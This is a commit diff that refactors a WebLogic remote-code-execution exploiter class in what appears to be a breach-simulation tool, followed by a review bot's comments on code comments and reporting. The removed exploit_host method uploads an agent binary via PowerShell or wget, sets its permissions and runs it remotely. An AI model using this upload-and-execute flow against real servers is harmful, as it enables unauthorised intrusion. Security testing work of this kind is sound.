Refactored according to final web_rce framework changes
parent
10528c313d
commit
8fd42abd5d
|
@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
|
|||
'win32': 'monkey-32.exe',
|
||||
'win64': 'monkey-64.exe'})
|
||||
|
||||
def exploit_host(self):
|
||||
# Get open ports
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = self.build_potential_urls(ports, URLS)
|
||||
|
||||
# Checking takes a lot of time, so we check until we get exploitable url and stop
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
# Get full URL
|
||||
if self.test_exploit(url):
|
||||
vulnerable_urls.append(url)
|
||||
break
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
|
||||
data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if not data or data['response'] is False:
|
||||
return False
|
||||
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['stop_checking_urls'] = True
|
||||
exploit_config['url_extensions'] = URLS
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
|
@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
|
|||
self._stopped = True
|
||||
return
|
||||
|
||||
def test_exploit(self, url):
|
||||
def check_if_exploitable(self, url):
|
||||
local_port = get_free_tcp_port()
|
||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
||||
|
|
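Review bot: `get_exploit_config` sets three flags with no comment, and the deleted `exploit_host` held the only explanation of why checking stops at the first hit ("Checking takes a lot of time, so we check until we get exploitable url and stop"). I would carry that over as `# Each URL check is slow, so stop at the first exploitable one` above `exploit_config['stop_checking_urls'] = True`, and add a one-line docstring saying the method overrides the WebRCE defaults for this exploiter. The deleted method also recorded `self._exploit_info['vulnerable_urls']`, which the run's reporting presumably relies on. The base-class flow that replaces it is not visible in this section, so it is worth confirming that it still records the URL. The body of the renamed `check_if_exploitable` continues past the end of the second hunk.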